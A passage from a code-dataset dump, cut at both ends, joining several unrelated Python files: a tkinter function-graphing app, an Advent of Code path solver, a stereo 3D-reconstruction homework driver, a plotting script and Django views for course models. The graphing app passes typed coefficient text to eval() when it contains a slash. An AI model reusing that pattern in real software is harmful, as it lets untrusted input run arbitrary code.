\"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"√(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = 
self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n x3_label = tk.Label(frame, text = \") - \", font = \"Times 10\", bg = \"white\")\n x3_label.grid(column = 6, row = 0)\n\n entry4 = tk.Entry(frame, width = 4, textvariable = self.d_text)\n entry4.grid(column = 7, row = 0)\n\n def xtox(self, frame):\n for widget in frame.winfo_children():\n widget.destroy()\n\n fx = tk.Label(frame, text = \"f\" + str(self.id + 1) + \"(x) = \", font = \"Times 12\", bg = \"white\")\n fx.grid(column = 0, row = 0)\n\n entry1 = tk.Entry(frame, width = 4, textvariable = self.a_text)\n entry1.grid(column = 1, row = 0)\n\n x1_label = tk.Label(frame, text = \"x^(\", font = \"Times 10\", bg = \"white\")\n x1_label.grid(column = 2, row = 0)\n\n entry2 = tk.Entry(frame, width = 4, textvariable = self.b_text)\n entry2.grid(column = 3, row = 0)\n\n x2_label = tk.Label(frame, text = \"x - \", font = \"Times 10\", bg = \"white\")\n x2_label.grid(column = 4, row = 0)\n\n entry3 = tk.Entry(frame, width = 4, textvariable = self.c_text)\n entry3.grid(column = 5, row = 0)\n\n x3_label = tk.Label(frame, text = \") - \", font = \"Times 10\", bg = \"white\")\n x3_label.grid(column = 6, row = 0)\n\n entry4 = tk.Entry(frame, width = 4, textvariable = self.d_text)\n entry4.grid(column = 7, row = 0)\n\n def delete(self):\n self.functions.destroy()\n self.window.delete_line(self.line, self.id)\n self.window.functions_id -= 1\n\n def entry_callback(self, event1, event2, event3):\n # parse each coefficient entry; a lone \"-\" is kept while the user is still typing, and \"/\" allows simple fractions such as \"1/2\" via eval\n try:\n self.a = float(self.a_text.get())\n except ValueError:\n if self.a_text.get() == \"-\":\n self.a = 0\n elif \"/\" in self.a_text.get():\n self.a = float(eval(self.a_text.get()))\n else:\n self.a = 0\n self.a_text.set(\"\")\n try:\n self.b = float(self.b_text.get())\n except ValueError:\n if self.b_text.get() == \"-\":\n self.b = 0\n elif \"/\" in self.b_text.get():\n self.b = float(eval(self.b_text.get()))\n else:\n self.b = 0\n self.b_text.set(\"\")\n try:\n self.c = float(self.c_text.get())\n except ValueError:\n if self.c_text.get() == \"-\":\n self.c = 0\n elif \"/\" in self.c_text.get():\n self.c = float(eval(self.c_text.get()))\n else:\n self.c = 0\n self.c_text.set(\"\")\n try:\n self.d = float(self.d_text.get())\n except ValueError:\n if self.d_text.get() == \"-\":\n self.d = 0\n elif \"/\" in self.d_text.get():\n self.d = float(eval(self.d_text.get()))\n else:\n self.d = 0\n self.d_text.set(\"\")\n self.update_line()\n\n def __init__(self, GraphWindow, frame, root, id):\n self.window = GraphWindow\n print(\"ID in __init__: \", id)\n self.id = id\n self.a = random.randint(-5, 5)\n self.b = random.randint(1, 10)\n self.c = random.randint(1, 10)\n self.d = random.randint(1, 10)\n self.a_text = StringVar(root)\n self.b_text = StringVar(root)\n self.c_text = StringVar(root)\n self.d_text = StringVar(root)\n self.a_text.set(self.a)\n self.b_text.set(self.b)\n self.c_text.set(self.c)\n self.d_text.set(self.d)\n self.degree = StringVar(root)\n # colors = [\"blue\", \"yellow\", \"black\", \"purple\", \"red\", \"green\"]\n self.functions = tk.Frame(frame, bg = \"white\", highlightbackground = 'black', highlightcolor = \"black\",\n highlightthickness = 1) # bg=random.choice(colors))\n self.functions.pack(side = 'top', pady = 1, padx = 10)\n 
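# inner frame that drop_down() clears and repopulates with the \"f(x) = \" label and coefficient entries for the selected function type\n 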
self.function = tk.Frame(self.functions, bg = \"white\") # bg='yellow')\n self.function.pack(side = 'left', padx = 40, pady = 10)\n\n options_list = [\"First degree\", \"Second degree\", \"Third degree\", \"Logarithm\", \"sin(x)\", \"cos(x)\", \"tan(x)\",\n \"arcsin(x)\", \"arccos(x)\", \"arctan(x)\", \"√(x)\", \"x\\u207F\"]\n options = ttk.OptionMenu(self.functions, self.degree, options_list[0], *options_list, command = self.drop_down)\n options.pack(side = 'right', padx = 50)\n self.drop_down(options_list[0], firsttime = True)\n\n delete_button = ttk.Button(self.functions, text = 'Delete', command = lambda: self.delete())\n delete_button.pack(side = 'right')\n\n self.a_text.trace_add(\"write\", self.entry_callback)\n self.b_text.trace_add(\"write\", self.entry_callback)\n self.c_text.trace_add(\"write\", self.entry_callback)\n self.d_text.trace_add(\"write\", self.entry_callback)\n\n\nclass GraphWindow(Graph, FunctionBar):\n\n def new_function(self):\n if self.functions_id > 13:\n pass\n else:\n self.functions_id += 1\n temp = FunctionBar(self, self.functions_frame, self.root, self.functions_id)\n Graph.add_line(self, temp, self.ax, self.functions_id)\n\n def create_widgets(self):\n window_frame = tk.Frame(self.root, bg = \"white\")\n window_frame.pack(expand = True, fill = 'both')\n\n top_label = tk.Label(window_frame, font = \"Times 20\", text = \"Graph your functions here!\", bg = \"white\")\n top_label.pack()\n\n frame = tk.Frame(window_frame, bg = 'white')\n frame.pack(expand = True, fill = 'y')\n\n self.functions_frame = tk.Canvas(frame, bg = \"white\", highlightbackground = 'white', highlightcolor = \"white\")\n self.functions_frame.pack(side = \"left\", expand = True, fill = 'both')\n\n add_button = ttk.Button(frame, text = 'Add function', command = lambda: self.new_function())\n add_button.pack(anchor = 'ne', side = 'right', padx = 10)\n\n def update(self, val):\n x_pos = self.s_time_x.val\n y_pos = self.s_time_y.val\n self.ax.axis([x_pos - 10, x_pos + 10, y_pos - 10, y_pos + 10])\n self.f.canvas.draw_idle()\n\n def __init__(self):\n self.root = tk.Tk()\n self.root.title(\"Function Graphing\")\n self.root.config(bg = \"white\")\n self.root.geometry(\"1600x800\")\n self.f = Figure(figsize = (8, 8), dpi = 100)\n self.ax = self.f.add_subplot(1, 1, 1)\n super().__init__(self.f, self.root)\n\n self.ax.spines['left'].set_position('zero')\n self.ax.spines['bottom'].set_position('zero')\n self.ax.spines['top'].set_color('none')\n self.ax.spines['right'].set_color('none')\n major_ticks = numpy.arange(-110, 110, 1)\n minor_ticks = numpy.arange(-110, 110, 0.5)\n self.ax.set_xticks(major_ticks)\n self.ax.set_xticks(minor_ticks, minor = True)\n self.ax.set_yticks(major_ticks)\n self.ax.set_yticks(minor_ticks, minor = True)\n self.ax.grid(which = 'both')\n self.ax.set_ylim((-10, 10))\n self.x_lim = 10\n self.ax.set_xlim(- self.x_lim, self.x_lim)\n\n self.ax_x = self.f.add_axes([0.12, 0.070, 0.78, 0.03])\n self.ax_y = self.f.add_axes([0.12, 0.015, 0.78, 0.03])\n self.s_time_x = Slider(self.ax_x, 'X value', -10, 10, valinit = 0)\n self.s_time_y = Slider(self.ax_y, 'Y value', -10, 10, valinit = 0)\n\n self.s_time_x.on_changed(self.update)\n self.s_time_y.on_changed(self.update)\n\n self.functions_id = -1\n self.function_list = []\n self.create_widgets()\n\n self.new_function()\n # self.root.bind(\"\", self.print_wh)\n self.root.mainloop()\n\n\nif __name__ == \"__main__\":\n 
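# GraphWindow wires together the Tk widgets, the matplotlib Figure and the X/Y pan sliders, then blocks in mainloop() until the window closes\n 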
GraphWindow()\n","sub_path":"fuction_drawer/function_drawer.py","file_name":"function_drawer.py","file_ext":"py","file_size_in_byte":24165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"49220732","text":"\"\"\"day 24 part 1\"\"\"\nimport time\nfrom collections import namedtuple\nfrom itertools import combinations, permutations\n\nLocation = namedtuple('Location', ['x', 'y', 'n'])\n\n\ndef parse_puzzle(p):\n \"\"\"parse the puzzle\"\"\"\n nums = {}\n blocked = set()\n\n for i, line in enumerate(p):\n for j, l in enumerate(line):\n if l == '#':\n blocked.add((i, j))\n elif l != '.':\n nums[int(l)] = (i, j)\n\n return nums, blocked\n\n\nclass Puzzle():\n \"\"\"Puzzle class\"\"\"\n\n def __init__(self, inpt):\n self.nums, self.blocked = parse_puzzle(inpt)\n self.shape = (len(inpt[0]), len(inpt))\n\n def solve(self):\n \"\"\"main solve method\"\"\"\n\n # find all min dists\n dists = {}\n for s, e in combinations(self.nums.keys(), 2):\n dist = self.find_dist(self.nums[s], self.nums[e])\n dists[(s, e)] = dist\n dists[(e, s)] = dist\n\n # find min covering path\n start = time.time()\n res = self.brute_force(dists)\n print(f'Brute Force: {time.time() - start}')\n print(res)\n\n start = time.time()\n res = self.min_covering(dists)\n print(f'Algo: {time.time() - start}')\n print(res)\n\n return res\n\n def find_dist(self, start, end):\n \"\"\"find the minimum distance between two points\"\"\"\n queue = [Location(start[0], start[1], 0)]\n visited = {start}\n # breadth first search\n while queue:\n loc = queue.pop(0)\n\n # try all 4 directions\n for new_loc in [(loc.x + 1, loc.y), (loc.x - 1, loc.y),\n (loc.x, loc.y + 1), (loc.x, loc.y - 1)]:\n\n # make sure we haven't been there or it's blocked\n if new_loc not in self.blocked and new_loc not in visited:\n # if at the end then return\n if new_loc == end:\n return loc.n + 1\n # add to list and visited\n queue.append(Location(new_loc[0], new_loc[1], loc.n + 1))\n visited.add(new_loc)\n\n raise ValueError\n\n def brute_force(self, dists):\n \"\"\"brute force method\"\"\"\n vals = list(self.nums.keys())\n vals.remove(0)\n best = 100000\n order = None\n for p in permutations(vals):\n tot = dists[(0, p[0])]\n for i, v in enumerate(p[1:]):\n tot += dists[(p[i], v)]\n # add on the ending at 0\n tot += dists[(p[-1], 0)]\n\n if tot < best:\n best = tot\n order = p\n\n print([0] + list(order) + [0])\n return best\n\n def min_covering(self, dists):\n \"\"\"run TSP algo\"\"\"\n vals = list(self.nums.keys())\n vals.remove(0)\n c = {}\n for v in vals:\n c[((v, ), v)] = dists[(0, v)]\n\n for s in range(2, len(vals) + 1):\n for p in permutations(vals, s):\n for v in p:\n sub_p = list(p)\n sub_p.remove(v)\n sub_p = tuple(sub_p)\n c[(p, v)] = min(\n [c[(sub_p, m)] + dists[(m, v)] for m in sub_p])\n\n return min([\n v + dists[(k[1], 0)] for k, v in c.items()\n if len(k[0]) == len(vals)\n ])\n\n\nif __name__ == '__main__':\n test = \"\"\"###########\n#0.1.....2#\n#.#######.#\n#4.......3#\n###########\"\"\"\n print(Puzzle(test.split('\\n')).solve())\n print(Puzzle(open('24_input').read().split('\\n')).solve())\n","sub_path":"2016/24_02.py","file_name":"24_02.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"67444716","text":"import numpy as np\nimport cv2\nimport scipy.io\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nfrom my_functions import *\n#from mpl_toolkits.mplot3d import Axes3D\n#from 
IPython import embed\n\n# \"\"\"\n# Homework 2: 3D reconstruction from two Views\n# This function takes as input the name of the image pairs (i.e. 'house' or\n# 'library') and returns the 3D points as well as the camera matrices...but\n# some functions are missing.\n# NOTES\n# (1) The code has been written so that it can be easily understood. It has \n# not been written for efficiency.\n# (2) Don't make changes to this main function since I will run my\n# reconstruct_3d.m and not yours. I only want from you the missing\n# functions and they should be able to run without crashing with my\n# reconstruct_3d.m\n# (3) Keep the names of the missing functions as they are defined here,\n# otherwise things will crash\n# \"\"\"\n\nVISUALIZE = False\n\ndef reconstruct_3d(name):\n\t# ------- Load images, K matrices and matches -----\n\tdata_dir = \"../data/{}\".format(name)\n\n\t# images\n\tI1 = cv2.imread(f\"{data_dir}/{name}1.jpg\")\n\tI2 = cv2.imread(f\"{data_dir}/{name}2.jpg\")\n\t# of shape (H,W,C)\n\n\t# K matrices\n\tK1 = scipy.io.loadmat(f\"{data_dir}/{name}1_K.mat\")[\"K\"]\n\tK2 = scipy.io.loadmat(f\"{data_dir}/{name}2_K.mat\")[\"K\"]\n\n\t# corresponding points\n\tlines = open(f\"{data_dir}/{name}_matches.txt\").readlines()\n\tmatches = np.array([list(map(float, line.split())) for line in lines])\n\n\t# this is a N x 4 where:\n\t# matches(i,1:2) is a point (w,h) in the first image\n\t# matches(i,3:4) is the corresponding point in the second image\n\n\tif VISUALIZE:\n\t\tfig = plt.figure()\n\t\tax = fig.add_subplot(111)\n\t\tplt.imshow(np.concatenate([I1, I2], axis=1))\n\t\tplt.plot(matches[:, 0], matches[:, 1], \"+r\")\n\t\tplt.plot(matches[:, 2] + I1.shape[1], matches[:, 3], \"+r\")\n\t\tfor i in range(matches.shape[0]):\n\t\t\tline = Line2D([matches[i, 0], matches[i, 2] + I1.shape[1]], [matches[i, 1], matches[i, 3]], linewidth=1,\n\t\t\t\t\t\t color=\"r\")\n\t\t\t#ax.add_line(line)\n\t\tplt.savefig(f\"{data_dir}/{name}_matches.jpg\")\n\t\t#plt.show()\n\n\t## -------------------------------------------------------------------------\n\t## --------- Find fundamental matrix --------------------------------------\n\n\t# F : the 3x3 fundamental matrix,\n\t# res_err : mean squared distance between points in the two images and their\n\t# their corresponding epipolar lines\n\n\t(F, res_err) = fundamental_matrix(matches) # <------------------------------------- You write this one!\n\tprint(f\"Residual in F = {res_err}\")\n\tprint('the fundamental matrix F is {}'.format(F))\n\tE = K2.T @ F @ K1\n\n\t## -------------------------------------------------------------------------\n\t## ---------- Rotation and translation of camera 2 ------------------------\n\n\t# R : cell array with the possible rotation matrices of second camera\n\t# t : cell array of the possible translation vectors of second camera\n\t(R, t) = find_rotation_translation(E) # <------------------------------------- You write this one!\n\n\tprint(t)\n\tprint(R)\n\n\n\t# Find R2 and t2 from R,t such that largest number of points lie in front\n\t# of the image planes of the two cameras\n\tP1 = K1 @ np.concatenate([np.identity(3), np.zeros((3, 1))], axis=1)\n\n\t# the number of points in front of the image planes for all combinations\n\tnum_points = np.zeros([len(t), len(R)])\n\terrs = np.full([len(t), len(R)], np.inf)\n\n\tfor ti in range(len(t)):\n\t\tt2 = t[ti]\n\t\tfor ri in range(len(R)):\n\t\t\tR2 = R[ri]\n\t\t\tP2 = K2 @ np.concatenate([R2, t2[:, np.newaxis]], axis=1)\n\t\t\t(points_3d, errs[ti,ri]) = find_3d_points(P1, P2, matches) 
#<---------------------- You write this one!\n\t\t\tZ1 = points_3d[:,2]\n\t\t\tZ2 = (points_3d @ R2[2,:].T + t2[2])\n\t\t\tnum_points[ti,ri] = np.sum(np.logical_and(Z1>0,Z2>0))\n\t(ti,ri) = np.where(num_points==np.max(num_points))\n\tj = 0 # pick one out the best combinations\n\tprint(f\"Reconstruction error = {errs[ti[j],ri[j]]}\")\n\n\tt2 = t[ti[j]]\n\tR2 = R[ri[j]]\n\n\t# print(num_points)\n\t# print(errs)\n\t# print(t2)\n\t# print(R2)\n\n\tP2 = K2 @ np.concatenate([R2, t2[:, np.newaxis]], axis=1)\n\n\t# % compute the 3D points with the final P2\n\tpoints, _, matches_hat = find_3d_points(P1, P2, matches, True) # <---------------------------------------------- You have already written this one!\n\n\t## -------- plot points and centers of cameras ----------------------------\n\n\tplot_3d(points, t2, R2) #<-------------------------------------------------------------- You write this one!\n\t#visualize_matches(I1, I2, matches_hat)\n\nif __name__ == \"__main__\":\n\treconstruct_3d('library')","sub_path":"hw3_package/starter_code/code/reconstruct_3d.py","file_name":"reconstruct_3d.py","file_ext":"py","file_size_in_byte":4499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"409338128","text":"import matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib.ticker import MultipleLocator\nimport numpy as np\n\ny = [92.6, 87.8, 82.6, 73.0, 70.4]\ny2 = [87.2, 93.3, 85, 77.9, 80]\nx = [1, 2, 3, 4, 5]\n\nplt.rcParams[\"font.family\"] = \"Times New Roman\"\n\nfig, axes = plt.subplots(1, 1, figsize=(8, 4))\n# 折线图\naxes.plot(x, y, linestyle='-', color='#DE6B58', marker='x', linewidth=1.5)\naxes.plot(x, y2, linestyle='-', color='#E1A084', marker='x', linewidth=1.5)\n# 设置最小刻度间隔\naxes.yaxis.set_minor_locator(MultipleLocator(2.5))\naxes.xaxis.set_minor_locator(MultipleLocator(0.5))\n# 画网格线\naxes.grid(which='minor', c='lightgrey')\n# 设置x、y轴标签\naxes.set_ylabel(\"Generation Consistency\")\naxes.set_xlabel(\"KB Row Number\")\n# 设置y轴的刻度\naxes.set_yticks([70, 75, 80, 85, 90, 95])\n# 对每个数据点加标注\nfor x_, y_ in zip(x, y):\n axes.text(x_, y_, y_, ha='left', va='bottom')\nfor x_, y_ in zip(x, y2):\n axes.text(x_, y_, y_, ha='left', va='bottom')\n# 展示图片\nplt.show()\nfig.savefig(\"折线图.png\", dpi=800)\n","sub_path":"part1:折线图、柱状图、饼图/代码/折线图.py","file_name":"折线图.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"295237296","text":"from django.shortcuts import render\nfrom home.models import Etudiant, ModeleFormation, ModeleSemestre, ModeleUE, ModeleModule, SemestrePossible, SemestreAnnualise, Association_Etudiant_SemestreAnnualise, MoyenneSemestre, BAC, MentionBACPossible, TypeBAC, TypeCursus, CursusPossible, CursusPreDUT, CursusPostDUT\nfrom home.forms import ModuleForm, UEForm, SemestreForm, ModeleForm, BACForm, CursusForm\n\n# Create your views here.\ndef homeFormation(request):\n\treturn homeFormationMessage(request, False)\n\ndef homeFormationMessage(request, messageAAfficher):\n\t# liste de tout les modeles\n\tmodelesCursusDUT = ModeleFormation.objects.all().order_by('-id')\n\t\n\t# on détermine quel sont les models supprimable\n\tmodelesNonSupprimable = set()\n\tsemestresAnnu = SemestreAnnualise.objects.all()\n\t\n\tfor sem in semestresAnnu:\n\t\tmodelesNonSupprimable.add(sem.modeleFormation)\n\t\n\tform = ModeleForm()\n\t\n\t# on affiche\n\treturn render(request, 'enseignementManager/ModelesOnglets.html', locals())\n\t\ndef 
creerTreeViewModeleFormation(request):\n\t\n\tform = ModeleForm(request.POST)\n\t\n\tif form.is_valid():\n\t\t\n\t\ttry:\n\t\t\tmodeleExistant = ModeleFormation.objects.get(nom=request.POST['nom'])\n\t\t\t\n\t\t\t# Erreur, nom de modèle déjà existant.\n\t\t\ttitreErreur = 'Erreur de création du modèle.'\n\t\t\tmessageErreur = 'Le nom du modèle doit être unique.'\n\t\t\tdetailsErreur = []\n\t\t\tdetailsErreur.append('Il existe déjà un modèle nommé : \\'' + request.POST['nom'] + '\\'')\n\t\t\t\n\t\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\t\t\n\t\texcept ModeleFormation.DoesNotExist:\n\t\t\t\n\t\t\t# le cursus n'existe pas, on peut le rajouter\n\t\t\tmodele = form.save()\n\t\t\t\n\t\t\t#on crée une structure minimale pour le cursus avec au moins les 4 semestres\n\t\t\t\n\t\t\tModeleSemestre(intitule='Semestre 1', typeSemestre=SemestrePossible.objects.get(semestre='S1'), modeleFormation=modele).save()\n\t\t\tModeleSemestre(intitule='Semestre 2', typeSemestre=SemestrePossible.objects.get(semestre='S2'), modeleFormation=modele).save()\n\t\t\tModeleSemestre(intitule='Semestre 3', typeSemestre=SemestrePossible.objects.get(semestre='S3'), modeleFormation=modele).save()\n\t\t\tModeleSemestre(intitule='Semestre 4', typeSemestre=SemestrePossible.objects.get(semestre='S4'), modeleFormation=modele).save()\n\t\t\t\n\t\t\tsemestres = ModeleSemestre.objects.filter(modeleFormation=modele).order_by('typeSemestre')\n\t\t\t\n\t\t\tsemestresNonSupprimableEtudiant = []\n\t\t\t\n\t\t\t# on empeche de supprimer un semestre si il est le seul de ce type (il faut toujours au moins 4 semestres)\n\t\t\tsemestresNonSupprimableStructureMinimum = []\n\t\t\tfor semestre in semestres:\n\t\t\t\tlisteSem = ModeleSemestre.objects.filter(modeleFormation=semestre.modeleFormation, typeSemestre=semestre.typeSemestre)\n\t\t\t\tif len(listeSem) < 2:\n\t\t\t\t\tsemestresNonSupprimableStructureMinimum.append(semestre)\n\t\t\t\n\t\t\t# on détermine les semestres dont on peut modifier le structure (aucune moyenne relié à ce semestre)\n\t\t\tsemestresStructureNonAlterable = []\n\t\t\t\n\t\t\tUEs = []\n\t\t\tmodules = []\n\t\t\t\n\t\t\treturn render(request, 'enseignementManager/treeViewModeleFormation.html', locals())\n\t\ndef modifierTreeViewModeleFormation(request, idModele):\n\t\n\tmodele = ModeleFormation.objects.get(id=idModele)\n\t\n\t# les semestres qui font partie de ce modele\n\tsemestres = ModeleSemestre.objects.filter(modeleFormation=modele).order_by('typeSemestre')\n\t\n\t# on détermine les semestres qui sont supprimable (aucun étudiant n'y est inscrit)\n\tsemestresNonSupprimableEtudiant = []\n\tassocs = Association_Etudiant_SemestreAnnualise.objects.all()\n\tfor assoc in assocs:\n\t\tsemestresNonSupprimableEtudiant.append(assoc.modeleSemestre)\n\t\n\t# on empeche de supprimer un semestre si il est le seul de ce type (il faut toujours au moins 4 semestres)\n\tsemestresNonSupprimableStructureMinimum = []\n\tfor semestre in semestres:\n\t\tlisteSem = ModeleSemestre.objects.filter(modeleFormation=semestre.modeleFormation, typeSemestre=semestre.typeSemestre)\n\t\tif len(listeSem) < 2:\n\t\t\tsemestresNonSupprimableStructureMinimum.append(semestre)\n\t\n\t# on détermine les semestres dont on peut modifier le structure (aucune moyenne relié à ce semestre)\n\tsemestresStructureNonAlterable = []\n\tmoyennesSemestre = MoyenneSemestre.objects.all()\n\tfor moy in moyennesSemestre:\n\t\tsemestresStructureNonAlterable.append(moy.modeleSemestre)\n\t\n\t# les UEs qui font partie de ce modele\n\tUEs = []\n\t\n\tfor 
semestre in semestres:\n\t\tuesDuSemestre = ModeleUE.objects.filter(modeleSemestre=semestre)\n\t\tfor ue in uesDuSemestre:\n\t\t\tUEs.append(ue)\n\t\n\t# les modules qui font partie de ce modele\n\tmodules = []\n\t\n\tfor ue in UEs:\n\t\tmodulesDeUE = ModeleModule.objects.filter(modeleUE=ue)\n\t\tfor module in modulesDeUE:\n\t\t\tmodules.append(module)\n\t\n\treturn render(request, 'enseignementManager/treeViewModeleFormation.html', locals())\n\ndef supprimerModeleFormation(request, idModele):\n\t\n\ttry:\n\t\tmodele = ModeleFormation.objects.get(id=idModele)\n\texcept ModeleFormation.DoesNotExist:\n\t\ttitreErreur = 'Erreur de suppression du modèle de formation'\n\t\tmessageErreur = 'Le modèle de formation que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/formation'\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\t\n\t\tmessageAAfficher = 'Le modèle ' + modele.nom + ' a bien été supprimé'\n\t\tmodele.delete()\n\t\treturn homeFormationMessage(request, messageAAfficher)\n\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle de formation ' + modele.nom\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerModeleFormation/' + idModele\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\t\ndef paramModifierInformationsModeleFormation(request, idModele):\n\t\n\tmodele = ModeleFormation.objects.get(id=idModele)\n\tform = ModeleForm(instance=modele)\n\t\n\treturn render(request, 'enseignementManager/modifierInformationModeleFormation.html', locals())\n\t\ndef modifierInformationsModeleFormation(request):\n\t\n\tmodele = ModeleFormation.objects.get(id=request.POST['idModele'])\n\tform = ModeleForm(request.POST, instance=modele)\n\t\n\tif form.is_valid():\n\t\tform.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\ndef copierModeleFormation(request, idModele):\n\t\n\t# On récupère le modèle de formation à copier\n\ttry:\n\t\tmodeleFormationOriginal = ModeleFormation.objects.get(id=idModele)\n\texcept ModeleFormation.DoesNotExist:\n\t\ttitreErreur = 'Erreur de copie du modèle de formation'\n\t\tmessageErreur = 'Le modèle de formation que vous souhaitez copier n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/formation'\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\t# On crée le nouveau modèle de formation\n\t\n\t# 1) On cherche le premier nom de copie disponible\n\tnumCopie = 1\n\tmodeleExistant = ModeleFormation.objects.filter(nom=modeleFormationOriginal.nom + '_copie_' + str(numCopie))\n\twhile modeleExistant:\n\t\tnumCopie = numCopie + 1\n\t\tmodeleExistant = ModeleFormation.objects.filter(nom=modeleFormationOriginal.nom + '_copie_' + str(numCopie))\n\t\n\t# 2) On crée le modèle\n\tmodeleFormationCopie = ModeleFormation(nom=modeleFormationOriginal.nom + '_copie_' + str(numCopie), description=modeleFormationOriginal.description)\n\tmodeleFormationCopie.save()\n\t\n\t# On récupère la liste des modèles de semestre du modèle de formation à copier\n\tlisteModelesSemetresOrigine = ModeleSemestre.objects.filter(modeleFormation=modeleFormationOriginal)\n\t\n\t# pour chaque semestre du modèle d'origine\n\tfor modeleSemestreOrigine in listeModelesSemetresOrigine:\n\t\n\t\t# On crée une copie du semestre\n\t\tmodeleSemestreCopie = ModeleSemestre(intitule=modeleSemestreOrigine.intitule, 
modeleFormation=modeleFormationCopie, typeSemestre=modeleSemestreOrigine.typeSemestre)\n\t\tmodeleSemestreCopie.save()\n\t\t\n\t\t# On copie la sous arborescence du semestre\n\t\tlisteModelesUEsOrigine = ModeleUE.objects.filter(modeleSemestre=modeleSemestreOrigine)\n\t\tfor modeleUEOrigine in listeModelesUEsOrigine:\n\t\t\t\n\t\t\tmodeleUECopie = ModeleUE(code=modeleUEOrigine.code, intitule=modeleUEOrigine.intitule, coefficient=modeleUEOrigine.coefficient, modeleSemestre=modeleSemestreCopie)\n\t\t\tmodeleUECopie.save()\n\t\t\t\n\t\t\tlisteModelesModulesOrigine = ModeleModule.objects.filter(modeleUE=modeleUEOrigine)\n\t\t\tfor modeleModuleOrigine in listeModelesModulesOrigine:\n\t\t\t\t\n\t\t\t\tmodeleModuleCopie = ModeleModule(code=modeleModuleOrigine.code, intitule=modeleModuleOrigine.intitule, coefficient=modeleModuleOrigine.coefficient, modeleUE=modeleUECopie)\n\t\t\t\tmodeleModuleCopie.save()\n\t\n\treturn homeFormationMessage(request, 'Le modèle ' + modeleFormationOriginal.nom + ' a été copié sous le nom ' + modeleFormationCopie.nom)\n\t\ndef paramModifierSemestre(request, idModele, idSemestre):\n\t\n\tsemestre = ModeleSemestre.objects.get(id=idSemestre)\n\tform = SemestreForm(instance=semestre)\n\t\n\treturn render(request, 'enseignementManager/modifierSemestre.html', locals())\n\t\ndef modifierSemestre(request):\n\tsemestre = ModeleSemestre.objects.get(id=request.POST['idSemestre'])\n\tform = SemestreForm(request.POST, instance=semestre)\n\t\n\tif form.is_valid():\n\t\tform.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef paramAjouterSemestre(request, idModele):\n\t\n\tmodele = ModeleFormation.objects.get(id=idModele)\n\tform = SemestreForm()\n\t\n\treturn render(request, 'enseignementManager/ajouterSemestre.html', locals())\n\t\ndef ajouterSemestre(request):\n\tprint(request.POST)\n\tform = SemestreForm(request.POST)\n\t\n\tif form.is_valid():\n\t\tsemestre = form.save(commit = False)\n\t\tsemestre.modeleFormation = ModeleFormation.objects.get(id=request.POST['idModele'])\n\t\tsemestre.typeSemestre = SemestrePossible.objects.get(semestre=request.POST['typeSemestre'])\n\t\tsemestre.save()\n\t\n\treturn modifierTreeViewModeleFormation(request, request.POST['idModele'])\n\t\ndef supprimerSemestre(request, idModele, idSemestre):\n\t\n\ttry:\n\t\tmodeleSemestre = ModeleSemestre.objects.get(id=idSemestre)\n\texcept ModeleSemestre.DoesNotExist:\n\t\ttitreErreur = 'Erreur de suppression du modèle de semestre'\n\t\tmessageErreur = 'Le modèle de semestre que vous souhaitez supprimer n\\'existe pas.'\n\t\tdetailsErreur = []\n\t\tpageRetour = '/gestionEnseignement/modifierTreeViewModeleFormation/' + idModele\n\t\treturn render(request, 'erreurUtilisateur.html', locals())\n\t\n\tif request.method == 'POST' and 'formulaireDeConfirmation' in request.POST:\n\t\n\t\tmodeleSemestre.delete()\n\t\treturn modifierTreeViewModeleFormation(request, idModele)\n\t\n\telse:\n\t\t\n\t\tactionUtilisateur = 'Supprimer le modèle de semestre ' + modeleSemestre.intitule\n\t\tvaleursPOSTAConserver = []\n\t\tlienActionUtilisateur = '/gestionEnseignement/supprimerSemestre/' + idModele + '/' + idSemestre\n\t\treturn render(request, 'pageConfirmation.html', locals())\n\t\ndef paramModifierUE(request, idModele, idUE):\n\t\n\tue = ModeleUE.objects.get(id=idUE)\n\tform = UEForm(instance=ue)\n\t\n\treturn render(request, 'enseignementManager/modifierUE.html', locals())\n\t\ndef modifierUE(request):\n\tue = ModeleUE.objects.get(id=request.POST['idUE'])\n\tform = 
